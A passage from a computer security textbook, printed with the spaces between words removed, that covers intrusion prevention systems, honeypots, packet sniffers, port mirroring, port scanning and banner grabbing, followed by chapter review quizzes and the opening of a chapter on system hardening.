ThetermintrusionpreventionsystemwasoriginallycoinedbyAndrewPlatoinmarketingliteraturedevelopedforNetworkICE,acompanythatwaspurchasedbyISSandwhichisnowpartofIBM.ThetermIPShaseffectivelytakentheplaceoftheterm“activeIDS.”
LikeIDSs,mostIPSshaveaninternalsignaturedatabasetocomparenetworktrafficagainstknown“bad”trafficpatterns.IPSscanperformcontent-basedinspections,lookinginsidenetworkpacketsforuniquepackets,datavalues,orpatternsthatmatchknownmaliciouspatterns.SomeIPSscanperformprotocolinspection,inwhichtheIPSdecodestrafficandanalyzesitasitwouldappeartotheserverreceivingit.Forexample,manyIPSscandoHTTPprotocolinspection,sotheycanexamineincomingandoutgoingHTTPtrafficandprocessitasanHTTPserverwould.TheadvantagehereisthattheIPScandetectanddefeatpopularevasiontechniquessuchasencodingURLsbecausetheIPS“sees”thetrafficinthesamewaythewebserverwouldwhenitreceivesanddecodesit.TheIPScanalsodetectactivitythatisabnormalorpotentiallymaliciousforthatprotocol,suchaspassinganextremelylargevalue(over10,000characters)toaloginfieldonawebpage.
ExamTip:AnIDSislikeaburglaralarm—itwatchesandalertsyouwhensomethingbadhappens.AnIPSislikeanarmedsecurityguard—itwatches,stopsthebadactivity,andthenletsyouknowwhathappened.
UnlikeatraditionalIDS,anIPSmustsitinline(intheflowoftraffic)tobeabletointeracteffectivelywiththenetworktraffic.MostIPSscanoperatein“stealthmode”anddonotrequireanIPaddressfortheconnectionstheyaremonitoring.WhenanIPSdetectsmalicioustraffic,itcandroptheoffendingpackets,resetincomingorestablishedconnections,generatealerts,quarantinetrafficto/fromspecificIPaddresses,orevenblocktrafficfromoffendingIPaddressesonatemporaryorpermanentbasis.Astheyaresittinginline,mostIPSscanalsoofferrate-basedmonitoringtodetectandmitigatedenial-of-serviceattacks.Withrate-
basedmonitoring,theIPScanwatchtheamountoftraffictraversingthenetwork.IftheIPSseestoomuchtrafficcomingintoorgoingoutfromaspecificsystemorsetofsystems,theIPScaninterveneandthrottledownthetraffictoalowerandmoreacceptablelevel.ManyIPSsperformthisfunctionby“learning”whatare“normal”networktrafficpatternswithregardtonumberofconnectionspersecond,amountofpacketsperconnection,packetscomingfromorgoingtospecificports,andsoon,andcomparingcurrenttrafficratesfornetworktraffic(TCP,UDP,ARP,ICMP,andsoon)tothoseestablishednorms.Whenatrafficpatternreachesathresholdorvariesdramaticallyfromthosenorms,theIPScanreactandinterveneasneeded.
TechTip
InlineNetworkDevicesAn“inline”networkdeviceissomethingthatispositionedintheflowoftraffic—networktrafficmustpassthroughitgoingintooroutofthenetwork.Anyinlinedevicehasthepotentialtostopnetworktrafficifthatdevicefails.Toallownetworktraffictoflow,manynetworkdeviceswillfail“open,”meaningtheysimplypasstrafficfromoneinterfacetoanotherwithoutinspectingitorinteractingwithit.SomeadministratorschoosetohavetheirfirewallsandIPSsfail“closed,”meaningthatifthedevicesarenotfunctioningcorrectly,alltrafficisstoppeduntilthosedevicescanberepaired.
LikeatraditionalIDS,theIPShasapotentialweaknesswhendealingwithencryptedtraffic.TrafficthatisencryptedwilltypicallypassbytheIPSuntouched(provideditdoesnottriggeranynon-content–relatedalarmssuchasrate-basedalarms).Tocounterthisproblem,someIPSvendorsareincludingtheabilitytodecryptSecureSocketsLayer(SSL)sessionsforfurtherinspection.Todothis,someIPSsolutionsstorecopiesofanyprotectedwebservers’privatekeysonthesensoritself.WhentheIPSseesasessioninitiationrequest,itmonitorstheinitialtransactionsbetweentheserverandtheclient.Byusingtheserver’sstoredprivatekeys,theIPSwillbeabletodeterminethesessionkeysnegotiatedduring
theSSLsessioninitiation.Withthesessionkeys,theIPScandecryptallfuturepacketspassedbetweenserverandclientduringthatwebsession.ThisgivestheIPStheabilitytoperformcontentinspectiononSSL-encryptedtraffic.
Thetermwirespeedreferstothetheoreticalmaximumtransmissionrateofacableorothermediumandisbasedonanumberoffactors,includingthepropertiesofthecableitselfandtheconnectionprotocolinuse(inotherwords,howmuchdatacanbepushedthroughunderidealconditions).
YouwilloftenseeIPSs(andIDSs)advertisedandmarketedbytheamountoftraffictheycanprocesswithoutdroppingpacketsorinterruptingtheflowofnetworktraffic.Inreality,anetworkwillneverreachitshypotheticalmaximumtransmissionrate,orwirespeed,duetoerrors,collisions,retransmissions,andotherfactors;therefore,a1-Gbpsnetworkisnotactuallycapableofpassing1Gbpsofnetworktraffic,evenifallthecomponentsareratedtohandle1Gbps.Whenusedinamarketingsense,wirespeedisthemaximumthroughputratethenetworkingorsecuritydeviceequipmentcanprocesswithoutimpactingthatnetworktraffic.Forexample,a1-GbpsIPSshouldbeabletoprocess,analyze,andprotect1Gbpsofnetworktrafficwithoutimpactingtrafficflow.IPSvendorsoftenquotetheirproducts’capacityasthecombinedthroughputpossiblethroughallavailableportsontheIPSsensor—a10-Gbpssensormayhave12GigabitEthernetportsbutiscapableofhandlingonly10Gbpsofnetworktraffic.
TechTip
DetectionControlsvs.PreventionControlsWhensecuringyourorganization,especiallyyournetworkperimeterandcriticalsystems,youwilllikelyhavetomakesomechoicesastowhattypeofprotectivemeasuresandcontrolsyouneedtoimplement.Forexample,youmayneedtodecidebetweendetectioncontrols
(capabilitiesthatdetectandalertonsuspiciousormaliciousactivity)andpreventioncontrols(capabilitiesthatstopsuspiciousormaliciousactivity).ConsiderthedifferencesbetweenatraditionalIDSandIPS.AlthoughmanyIDSshavesometypeofresponsecapability,theirrealpurposeistowatchforactivityandthenalertwhen“hostile”activityisnoted.Ontheotherhand,anIPSisdesignedtoblock,thwart,andpreventthatsame“hostile”activity.Aparallelexampleinthephysicalsecurityspacewouldbeacameraandasecurityguard.
Acamerawatchesactivityandcanevengeneratealertswhenmotionisdetected.Butacameracannotstopanintruderfrombreakingintoafacilityandstealingsomething—itonlyrecordsandalerts.Asecurityguard,however,hastheabilitytostoptheintruderphysically,eitherbeforetheybreakintothefacilityorbeforetheycanleavewiththestolengoods.
HoneypotsandHoneynetsAsisoftenthecase,oneofthebesttoolsforinformationsecuritypersonnelhasalwaysbeenknowledge.Tosecureanddefendanetworkandtheinformationsystemsonthatnetworkproperly,securitypersonnelneedtoknowwhattheyareupagainst.Whattypesofattacksarebeingused?Whattoolsandtechniquesarepopularatthemoment?Howeffectiveisacertaintechnique?Whatsortofimpactwillthistoolhaveonmynetwork?Oftenthissortofinformationispassedthroughwhitepapers,conferences,mailinglists,orevenwordofmouth.Insomecases,thetooldevelopersthemselvesprovidemuchoftheinformationintheinterestofpromotingbettersecurityforeveryone.Informationisalsogatheredthroughexaminationandforensicanalysis,
oftenafteramajorincidenthasalreadyoccurredandinformationsystemsarealreadydamaged.Oneofthemosteffectivetechniquesforcollectingthistypeofinformationistoobserveactivityfirsthand—watchinganattackerasheprobes,navigates,andexploitshiswaythroughanetwork.Toaccomplishthiswithoutexposingcriticalinformationsystems,securityresearchersoftenusesomethingcalledahoneypot.Ahoneypot,sometimescalledadigitalsandbox,isanartificial
environmentwhereattackerscanbecontainedandobservedwithoutputtingrealsystemsatrisk.Agoodhoneypotappearstoanattackertobearealnetworkconsistingofapplicationservers,usersystems,network
traffic,andsoon,butinmostcasesit’sactuallymadeupofoneorafewsystemsrunningspecializedsoftwaretosimulatetheuserandnetworktrafficcommontomosttargetednetworks.Figure13.9illustratesasimplehoneypotlayoutinwhichasinglesystemisplacedonthenetworktodeliberatelyattractattentionfrompotentialattackers.
•Figure13.9Logicaldepictionofahoneypot
Figure13.9showsthesecurityresearcher’sviewofthehoneypot,whileFigure13.10showstheattacker’sview.Thesecurityadministratorknowsthatthehoneypot,inthiscase,actuallyconsistsofasinglesystemrunningsoftwaredesignedtoreacttoprobes,reconnaissanceattempts,andexploitsasifitwereanentirenetworkofsystems.Whentheattackerconnectstothehoneypot,sheispresentedwithanentire“virtual”networkofserversandPCsrunningavarietyofapplications.Inmostcases,thehoneypotwill
appeartoberunningversionsofapplicationsthatareknowntobevulnerabletospecificexploits.Allthisisdesignedtoprovidetheattackerwithanenticing,hopefullyirresistible,target.
•Figure13.10Virtualnetworkcreatedbythehoneypot
Anytimeanattackerhasbeenluredintoprobingorattackingthevirtualnetwork,thehoneypotrecordstheactivityforlateranalysis:whattheattackerdoes,whichsystemsandapplicationssheconcentrateson,what
toolsarerun,howlongtheattackerstays,andsoon.Allthisinformationiscollectedandanalyzedinthehopesthatitwillallowsecuritypersonneltobetterunderstandandprotectagainstthethreatstotheirsystems.Therearemanyhoneypotsinuse,specializingineverythingfrom
wirelesstodenial-of-serviceattacks;mostarerunbyresearch,government,orlawenforcementorganizations.Whyaren’tmorebusinessesrunninghoneypots?Quitesimply,thetimeandcostareprohibitive.Honeypotstakealotoftimeandefforttomanageandmaintain,andevenmoreefforttosort,analyze,andclassifythetrafficthehoneypotcollects.Unlesstheyaredevelopingsecuritytools,mostcompaniesfocustheirlimitedsecurityeffortsonpreventingattacks,andinmanycases,companiesaren’teventhatconcernedwithdetectingattacksaslongastheattacksareblocked,areunsuccessful,anddon’taffectbusinessoperations.Eventhoughhoneypotscanserveasavaluableresourcebyluringattackersawayfromproductionsystemsandallowingdefenderstoidentifyandthwartpotentialattackersbeforetheycauseanyseriousdamage,thecostsandeffortsinvolveddetermanycompaniesfromusinghoneypots.Ahoneynetisacollectionoftwoormorehoneypots.Larger,very
diversenetworkenvironmentscandeploymultiplehoneypots(thusformingahoneynet)whenasinglehoneypotdevicedoesnotprovideenoughcoverage.Honeynetsareoftenintegratedintoanorganization-wideIDS/IPSbecausethehoneynetcanproviderelevantinformationaboutpotentialattackers.
ExamTip:Ahoneypotisasystemdesignedtoattractpotentialattackersbypretendingtobeoneormoresystemswithopennetworkservices.
Tools
Toolsareavitalpartofanysecurityprofessional’sskillset.Youmaynotbean“assessmentprofessional”whospendsmostofhisorhercareerexaminingnetworkslookingforvulnerabilities,butyoucanusemanyofthesametoolsforinternalassessmentactivities,trackingdowninfectedsystems,spottinginappropriatebehavior,andsoon.Knowingtherighttoolforthejobcanbecriticaltoperformingeffectively.
ProtocolAnalyzerAprotocolanalyzer(alsoknownasapacketsniffer,networkanalyzer,ornetworksniffer)isapieceofsoftwareoranintegratedsoftware/hardwaresystemthatcancaptureanddecodenetworktraffic.Protocolanalyzershavebeenpopularwithsystemadministratorsandsecurityprofessionalsfordecadesbecausetheyaresuchversatileandusefultoolsforanetworkenvironment.Fromasecurityperspective,protocolanalyzerscanbeusedforanumberofactivities,suchasthefollowing:
Detectingintrusionsorundesirabletraffic(anIDS/IPSmusthavesometypeofcaptureanddecodeabilitytobeabletolookforsuspicious/malicioustraffic)
Capturingtrafficduringincidentresponseorincidenthandling
Lookingforevidenceofbotnets,Trojans,andinfectedsystems
Lookingforunusualtrafficortrafficexceedingcertainthresholds
Testingencryptionbetweensystemsorapplications
Fromanetworkadministrationperspective,protocolanalyzerscanbeusedforactivitiessuchasthese:
Analyzingnetworkproblems
Detectingmisconfiguredapplicationsormisbehavingapplications
Gatheringandreportingnetworkusageandtrafficstatistics
Debuggingclient/servercommunications
ExamTip:AsniffermustuseaNICplacedinpromiscuous(promisc)modeoritwillnotseeallthenetworktrafficcomingintotheNIC.
Regardlessoftheintendeduse,aprotocolanalyzermustbeabletoseenetworktrafficinordertocaptureanddecodeit.Asoftware-basedprotocolanalyzermustbeabletoplacetheNICitisgoingtousetomonitornetworktrafficinpromiscuousmode(sometimescalledpromiscmode).PromiscuousmodetellstheNICtoprocesseverynetworkpacketitseesregardlessoftheintendeddestination.Normally,aNICprocessesonlybroadcastpackets(whichgotoeveryoneonthatsubnet)andpacketswiththeNIC’sMediaAccessControl(MAC)addressasthedestinationaddressinsidethepacket.Asasniffer,theanalyzermustprocesseverypacketcrossingthewire,sotheabilitytoplaceaNICintopromiscuousmodeiscritical.Witholdernetworkingtechnologies,suchashubs,itwaseasierto
operateaprotocolanalyzer,asthehubbroadcastedeverypacketacrosseveryinterfaceregardlessofthedestination.Withswitchesnowthestandardfornetworkingequipment,placingaprotocolanalyzerbecomesmoredifficultasswitchesdonotbroadcasteverypacketacrosseveryport.Whilethismaymakeitharderforadministratorstosniffthetraffic,italsomakesitharderforeavesdroppersandpotentialattackers.Toaccommodateprotocolanalyzers,IDSdevices,andIPSdevices,
mostswitchmanufacturerssupportportmirroringoraSwitchedPortAnalyzer(SPAN)port(discussedinthenextsection).Dependingonthemanufacturerandthehardware,amirroredportwillseeallthetrafficpassingthroughtheswitchorthroughaspecificVLAN(s),orallthetrafficpassingthroughotherspecificswitchports.Thenetworktrafficisessentiallycopied(ormirrored)toaspecificport,whichcanthensupportaprotocolanalyzer.
Anotheroptionfortrafficcaptureistouseanetworktap,ahardwaredevicethatcanbeplacedinlineonanetworkconnectionandthatwillcopytrafficpassingthroughthetaptoasecondsetofinterfacesonthetap.Networktapsareoftenusedtosnifftrafficpassingbetweendevicesatthenetworkperimeter,suchasthetrafficpassingbetweenarouterandafirewall.Manycommonnetworktapsworkbybridginganetworkconnectionandpassingincomingtrafficoutonetapport(A)andoutgoingtrafficoutanothertapport(B),asshowninFigure13.11.
•Figure13.11Abasicnetworktap
Apopular,opensourceprotocolanalyzerisWireshark(www.wireshark.org).AvailableforbothUNIXandWindowsoperatingsystems,WiresharkisaGUI-basedprotocolanalyzerthatallowsuserstocaptureanddecodenetworktrafficonanyavailablenetworkinterfaceinthesystemonwhichthesoftwareisrunning(includingwirelessinterfaces),asdemonstratedinFigure13.12.Wiresharkhassomeinterestingfeatures,includingtheabilityto“followtheTCPstream,”whichallowstheusertoselectasingleTCPpacketandthenseealltheotherpacketsinvolvedinthatTCPconversation.
•Figure13.12Wireshark—apopular,opensourceprotocolanalyzer
SwitchedPortAnalyzerThetermSwitchedPortAnalyzer(SPAN)isusuallyassociatedwithCiscoswitches—othervendorsrefertothesamecapabilityasportmirroringorportmonitoring.ASPANhastheabilitytocopynetworktrafficpassingthroughoneormoreportsonaswitchoroneormoreVLANsonaswitchandforwardthatcopiedtraffictoaportdesignatedfortrafficcaptureandanalysis(asshowninFigure13.13).ASPANportormirrorportcreatesthecollectionpointfortrafficthatwillbefedintoaprotocolanalyzerorIDS/IPS.SPANormirrorportscanusuallybeconfiguredtomonitortrafficpassingintointerfaces,passingoutofinterfaces,orpassinginbothdirections.Whenconfiguringportmirroring,youneedtobeawareofthecapabilitiesoftheswitchyouareworkingwith.Canithandlethevolumeoftraffic?Canitsuccessfullymirrorallthetraffic,orwillitendupdroppingpacketstotheSPANiftrafficvolumegetstoohigh?
•Figure13.13ASPANportcollectstrafficfromotherportsonaswitch.
PortScannerAportscannerisatooldesignedtoprobeasystemorsystemsforopenports.Itsjobistoprobeforopen(orlistening)portsandreportbacktotheuserwhichportsareclosed,whicharefiltered,andwhichareopen.Portscannersareavailableforvirtuallyeveryoperatingsystemandalmosteverypopularmobilecomputingplatform—fromtabletstosmartphones.Havingagoodport-scanningtoolinyourtoolsetandknowinghowtouseitcanbeverybeneficial.Thegoodnews/badnewsaboutportscannersisthatthe“badguys”usethemforbasicallythesamereasonsthegoodguysusethem.Portscannerscanbeusedtodothefollowing:
Searchfor“live”hostsonanetwork.Mostportscannersenableyou
toperformaquickscanusingICMP,TCP,orUDPpacketstosearchforactivehostsonagivennetworkornetworksegment.ICMPisstillverypopularforthistask,butwiththedefaultblockingofICMPv4inmanymodernoperatingsystems,suchasWindows7andbeyond,usersareincreasinglyturningtoTCPorUDPscansforthesetasks.
Searchforanyopenportsonthenetwork.Portscannersaremostoftenusedtoidentifyanyopenportsonahost,groupofhosts,ornetwork.Byscanningalargenumberofportsoveralargenumberofhosts,aportscannercanprovideyou(oranattacker)withaverygoodpictureofwhatservicesarerunningonwhichhostsonyournetwork.Scanscanbedoneforthe“default”setofpopularports,alargerangeofports,oreverypossibleport(from1to65535).
Searchforspecificports.Onlylookingforwebservers?Mailservers?Portscannerscanalsobeconfiguredtojustlookforspecificservices.
Identifyservicesonports.Someportscannerscanhelpidentifytheservicesrunningonopenportsbasedoninformationreturnedbytheserviceortheport/serviceassigned(ifstandardshavebeenfollowed).Forexample,aservicerunningonport80islikelytobeawebserver.
LookforTCP/UDPservices.MostportscannerscanperformscansforbothTCPandUDPservices,althoughsometoolsdonotallowyoutoscanforbothprotocolsatthesametime.
Asasecurityprofessional,you’lluseportscannersinmuchthesamewayanattackerwould:toprobethesystemsinyournetworkforopenservices.Whenyoufindopenservices,you’llneedtodetermineifthoseservicesshouldberunningatall,iftheyshouldberunningonthesystem(s)youfoundthemon,andifyoucandoanythingtolimitwhatconnectionsareallowedtothoseservices.Forexample,youmaywanttoscanyournetworkforanysystemacceptingconnectionsonTCPport1433(MicrosoftSQLServer).IfyoufindasystemacceptingconnectionsonTCPport1433inyourSalesgroup,chancesaresomeonehasinstalledsomethingtheyshouldn’thave(orsomeoneinstalledsomethingforthem).
Sohowdoesaportscanneractuallywork?Muchwilldependontheoptionsyouselectwhenconfiguringyourscan,butforthesakeofthisexample,assumeyou’rerunningastandardTCPconnectscanagainst192.168.1.20forports1–10000.ThescannerwillattempttocreateaTCPconnectiontoeachportintherange1–10000on192.168.1.20.WhenthescannersendsoutthatSYNpacket,itwaitsfortherespondingSYN/ACK.IfaSYN/ACKisreceived,thescannerwillattempttocompletethethree-wayhandshakeandmarktheportas“open.”IfthesentpackettimesoutoranRSTpacketisreceived,thescannerwilllikelymarkthatportas“closed.”Ifan“administrativelyprohibited”messageorsomethingsimilarcomesback,thescannermaymarkthatportas“filtered.”Whenthescaniscomplete,thescannerwillpresenttheresultsinasummaryformat—listingtheportsthatareopen,closed,filtered,andsoon.Byexaminingtheresponsesfromeachport,youcantypicallydeduceabitmoreinformationaboutthesystem(s)youarescanning,asdetailedhere:
OpenOpenportsacceptconnections.Ifyoucanconnecttothesewithaportscanner,theportsarenotbeingfilteredatthenetworklevel.However,thereareinstanceswhereyoumayfindaportthatismarkedas“open”byaportscannerthatwillimmediatelydropyourconnectionsifyouattempttoconnecttoitinsomeothermanner.Forexample,port22forSSHmayappear“open”toaportscannerbutwillimmediatelydropyourSSHconnections.Insuchacase,theserviceislikelybeingfilteredbyahost-basedfirewallorafirewallcapabilitywithintheserviceitself.
ClosedYouwilltypicallyseethisresponsewhenthescannedtargetreturnsanRSTpacket.
FilteredYouwilltypicallyseethisresponsewhenanICMPunreachableerrorisreturned.Thisusuallyindicatesthatportisbeingfilteredbyafirewallorotherdevice.
AdditionaltypesSomeportscannerswillattempttofurtherclassifyresponses,suchasdropped,blocked,denied,timeout,andsoon.
Thesearefairlytoolspecific,andyoushouldrefertoanydocumentationorhelpfilethataccompaniesthatportscannerforadditionalinformation.
Ingeneral,youwillwanttorunyourscanningeffortsmultipletimesusingdifferentoptionstoensureyougetabetterpicture.ASYNscanmayreturndifferentresultsthanaNULLscanorFINscan.You’llwanttorunbothTCPandUDPscansaswell.Youmayneedtoalteryourscanningapproachtousemultipletechniquesatdifferenttimesoftheday/nighttoensurecompletecoverage.Thebadguysaredoingthisagainstyournetworkrightnow,soyoumightaswellusethesametoolstheydotoseewhattheysee.Portscannerscanalsobeveryusefulfortestingfirewallconfigurationsbecausetheresultsoftheportscanscanshowyouexactlywhichportsareopen,whichonesyouallowthrough,whichportsarecarryingservices,andsoon.Sohowdoyoudefendagainstportscans?Well,it’stough.Portscans
areprettymuchapartoftheInternettrafficlandscapenow.AlthoughyoucanblockIPaddressesthatscanyou,mostorganizationsdon’tbecauseyouruntheriskofanattackerspoofingsourceaddressesasdecoysforotherscanningactivity.Thebestdefenseistocarefullycontrolwhattrafficyouletinandoutofyournetwork,usingfirewalls,networkfilters,andhostfilters.Thencarefullymonitoranytrafficthatyoudoallowin.
Passivevs.ActiveToolsToolscanbeclassifiedasactiveorpassive.Activetoolsinteractwithatargetsysteminafashionwheretheirusecanbedetected.ScanninganetworkwithNmap(NetworkMapper)isanactiveactthatcanbedetected.InthecaseofNmap,thetoolmaynotbespecificallydetectable,butitsuse,thesendingofpackets,canbedetected.Whenyouneedtomapoutyournetworkorlookforopenservicesononeormorehosts,aportscannerisprobablythemostefficienttoolforthejob.Figure13.14showsascreenshotofZenmap,across-platformversionoftheverypopularNmapportscanneravailablefromhttp://insecure.org.
•Figure13.14Zenmap—aportscannerbasedonNmap
Passivetoolsarethosethatdonotinteractwiththesysteminamannerthatwouldpermitdetection,asinsendingpacketsoralteringtraffic.AnexampleofapassivetoolisTripwire,whichcandetectchangestoafilebasedonhashvalues.AnotherpassiveexampleistheOSmappingbyanalyzingTCP/IPtraceswithatoolsuchasWireshark.Passivesensorscanuseexistingtraffictoprovidedataforanalysis.
ExamTip:Passivetoolsreceivetrafficonlyanddonothingtothetrafficflowthatwouldpermitotherstoknowtheyareinteractingwiththenetwork.Activetoolsmodifyorsendtrafficandarethusdiscoverablebytheirtrafficpatterns.
BannerGrabbingBannergrabbingisatechniqueusedtogatherinformationfromaservicethatpublicizesinformationviaabanner.Bannerscanbeusedformanythings;forexample,theycanbeusedtoidentifyservicesbytype,version,andsoforth,andtheyenableadministratorstopostinformation,includingwarnings,touserswhentheylogin.Attackerscanusebannerstodeterminewhatservicesarerunning,andtypicallydoforcommonbanner-issuingservicessuchasHTTP,FTP,SMTP,andTelnet.Figure13.15showsacoupleofbannergrabsbeingperformedfromaTelnetclientagainstawebserver.Inthisexample,Telnetsendsinformationtotwodifferentwebserversanddisplaystheresponses(thebanners).ThetopresponseisfromanApacheinstance(Apache/2.0.65)andthebottomisfromMicrosoftIIS(Microsoft-HTTPAPI/2.0).
•Figure13.15BannergrabbingusingTelnet
Chapter13Review
ForMoreInformationSANSIntrusionDetectionFAQwww.sans.org/security-resources/idfaq/
SANSReadingRoom—Firewalls&PerimeterProtectionwww.sans.org/reading_room/whitepapers/firewalls/
TheHoneynetProjectwww.honeynet.orgFightSpamontheInternet!http://spam.abuse.net/
LabManualExercisesThefollowinglabexercisesfromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providepracticalapplicationofmaterialcoveredinthischapter:
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingfactsaboutintrusiondetectionsystemsandnetworksecurity.
Applytheappropriatenetworktoolstofacilitatenetworksecurity
Intrusiondetectionisamechanismfordetectingunexpectedorunauthorizedactivityoncomputersystems.
IDSscanbehost-based,examiningonlytheactivityapplicabletoaspecificsystem,ornetwork-based,examiningnetworktrafficforalargenumberofsystems.
Protocolanalyzers,oftencalledsniffers,aretoolsthatcaptureanddecodenetworktraffic.
Honeypotsarespecializedformsofintrusiondetectionthatinvolvesettingupsimulatedhostsandservicesforattackerstotarget.
Honeypotsarebasedontheconceptofluringattackersawayfromlegitimatesystemsbypresentingmoretemptingorinterestingsystemsthat,inmostcases,appeartobeeasytargets.
Determinetheappropriateuseoftoolstofacilitatenetworksecurity
IDSsmatchpatternsknownassignaturesthatcanbecontent-orcontext-based.SomeIDSsaremodel-basedandalertanadministratorwhenactivitydoesnotmatchnormalpatterns(anomaly-based)orwhenitmatchesknownsuspiciousormaliciouspatterns(misusedetection).
NewerversionsofIDSsincludepreventioncapabilitiesthatautomaticallyblocksuspiciousormalicioustrafficbeforeitreachesitsintendeddestination.Mostvendorscalltheseintrusionpreventionsystems(IPSs).
Analyzersmustbeabletoseeandcapturenetworktraffictobeeffective,andmanyswitchvendorssupportnetworkanalysisthroughtheuseofmirroringorSPANports.
Networktrafficcanalsobeviewedusingnetworktaps,adeviceforreplicatingnetworktrafficpassingacrossaphysicallink.
Bymonitoringactivitywithinthehoneypot,securitypersonnelarebetterabletoidentifypotentialattackersalongwiththeirtoolsandcapabilities.
Applyhost-basedsecurityapplications
Host-basedIDSscanapplyspecificcontext-sensitiverulesbecauseoftheknownhostrole.
Host-basedIPSscanprovidebettercontroloverspecificattacksasthescopeofcontrolislimitedtoahost.
KeyTermsanalysisengine(379)anomalydetectionmodel(379)bannergrabbing(403)content-basedsignature(381)context-basedsignature(381)digitalsandbox(396)falsenegative(382)falsepositive(382)honeynet(397)honeypot(396)host-basedIDS(HIDS)(378)intrusiondetectionsystem(IDS)(376)intrusionpreventionsystem(IPS)(394)misusedetectionmodel(380)networktap(399)network-basedIDS(NIDS)(378)perimetersecurity(383)portmirroring(399)protocolanalyzer(398)signaturedatabase(379)Snort(387)Suricata(387)
SwitchedPortAnalyzer(SPAN)(400)trafficcollector(378)userinterfaceandreporting(379)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A(n)_______________isapieceofsoftwareoranintegratedsoftware/hardwaresystemthatcancaptureanddecodenetworktraffic.
2.WhenanIDSgeneratesanalarmon“normal”trafficthatisactuallynotmaliciousorsuspicious,thatalarmiscalleda(n)_______________.
3.Anattackerscanninganetworkfullofinviting,seeminglyvulnerabletargetsmightactuallybescanninga(n)_______________wheretheattacker’severymovecanbewatchedandmonitoredbysecurityadministrators.
4.A(n)_______________looksatacertainstringofcharactersinsideaTCPpacket.
5.AnIDSthatlooksforunusualorunexpectedbehaviorisusinga(n)_______________.
6._______________allowsadministratorstosendalltrafficpassingthroughanetworkswitchtoaspecificportontheswitch.
7.WithinanIDS,the_______________examinesthecollectednetworktrafficandcomparesittoknownpatternsofsuspiciousormaliciousactivitystoredinthesignaturedatabase.
8._______________isatechniquewhereahostisqueriedandidentifiedbasedonitsresponsetoaquery.
9._______________isatechniquetomatchanelementagainstalargesetofpatternsanduseactivityasascreeningelement.
10._______________isanewentryintheIDStoolsetasareplacementforSnort.
Multiple-ChoiceQuiz1.Whatarethetwomaintypesofintrusiondetectionsystems?
A.Network-basedandhost-based
B.Signature-basedandevent-based
C.Activeandreactive
D.Intelligentandpassive
2.WhatarethetwomaintypesofIDSsignatures?A.Network-basedandfile-based
B.Context-basedandcontent-based
C.Activeandreactive
D.Noneoftheabove
3.Whichofthefollowingdescribesapassive,host-basedIDS?A.Runsonthelocalsystem
B.Doesnotinteractwiththetrafficaroundit
C.Canlookatsystemeventanderrorlogs
D.Alloftheabove
4.Whichofthefollowingisnotacapabilityofnetwork-basedIDS?A.Candetectdenial-of-serviceattacks
B.Candecryptandreadencryptedtraffic
C.CandecodeUDPandTCPpackets
D.Canbetunedtoaparticularnetworkenvironment
5.AnactiveIDScan:A.RespondtoattackswithTCPresets
B.Monitorformaliciousactivity
C.AandB
D.Noneoftheabove
6.Honeypotsareusedto:A.Attractattackersbysimulatingsystemswithopennetwork
services
B.Monitornetworkusagebyemployees
C.ProcessalarmsfromotherIDSs
D.Attractcustomerstoe-commercesites
7.Connectingtoaserverandsendingarequestoveraknownportinanattempttoidentifytheversionofaserviceisanexampleof:
A.Portsniffing
B.Protocolanalysis
C.Bannergrabbing
D.TCPreset
8.Preventativeintrusiondetectionsystems:A.Arecheaper
B.Aredesignedtostopmaliciousactivityfromoccurring
C.Canonlymonitoractivity
D.WerethefirsttypesofIDS
9.IPSstandsfor:A.Intrusionprocessingsystem
B.Intrusionpreventionsensor
C.Intrusionpreventionsystem
D.Interactiveprotectionsystem
10.Aprotocolanalyzercanbeusedto:A.Troubleshootnetworkproblems
B.Collectnetworktrafficstatistics
C.Monitorforsuspicioustraffic
D.Alloftheabove
EssayQuiz1.Discussthedifferencesbetweenananomaly-basedandamisuse-
baseddetectionmodel.Whichwouldyouusetoprotectacorporatenetworkof10,000users?Whywouldyouchoosethatmodel?
2.Pickthreetechnologiesdiscussedinthischapteranddescribehowyouwoulddeploythemtoprotectasmallbusinessnetwork.Describetheprotectioneachtechnologyprovides.
LabProjects
•LabProject13.1
Designthreecontent-basedandthreecontext-basedsignaturesforuseinanIDS.Nameeachsignatureanddescribewhatthesignatureshouldlookfor,includingtrafficpatternsorcharactersthatneedtobematched.Describeanyactivitythatcouldgenerateafalsepositiveforeachsignature.
•LabProject13.2UsetheInternettoresearchSnort(anopensourceIDS).Withyourinstructor’spermission,downloadSnortandinstallitonyourclassroomnetwork.Examinethetrafficandnoteanyalarmsthataregenerated.Researchandnotethesourcesofthealarmtraffic.SeeifyoucantrackdownthesourcesofthealarmtrafficanddiscoverwhytheyaregeneratingthosealarmsonyourIDS.
chapter14 SystemHardeningandBaselines
PeoplecanhavetheModelTinanycolor—solongasit’sblack.
—HENRYFORD
T
Inthischapter,youwilllearnhowto
Hardenoperatingsystemsandnetworkoperatingsystems
Implementhost-levelsecurity
Hardenapplications
Establishgrouppolicies
Securealternativeenvironments(SCADA,real-time,etc.)
hemanyusesforsystemsandoperatingsystemsrequireflexiblecomponentsthatallowuserstodesign,configure,andimplementthesystemstheyneed.Yetitisthisveryflexibilitythatcausessomeofthe
biggestweaknessesincomputersystems.Computerandoperatingsystemdevelopersoftenbuildanddeliversystemsin“default”modesthatdolittletosecurethesystemfromexternalattacks.Fromtheviewofthedeveloper,thisisthemostefficientmodeofdelivery,asthereisnowaytheycananticipatewhateveryuserineverysituationwillneed.Fromtheuser’sview,however,thismeansagooddealofeffortmustbeputintoprotectingandsecuringthesystembeforeitiseverplacedintoservice.Theprocessofsecuringandpreparingasystemfortheproductionenvironmentiscalledhardening.Unfortunately,manyusersdon’tunderstandthestepsnecessarytosecuretheirsystemseffectively,resultinginhundredsofcompromisedsystemseveryday.Hardeningsystems,servers,workstations,networks,andapplicationsis
aprocessofdefiningtherequiredusesandneedsandaligningsecuritycontrolstolimitasystem’sdesiredfunctionality.Oncethisisdetermined,youhaveasystembaselinethatyoucancomparechangestooverthecourseofasystem’slifecycle.
OverviewofBaselinesTosecuresystemseffectivelyandconsistently,youmusttakeastructured
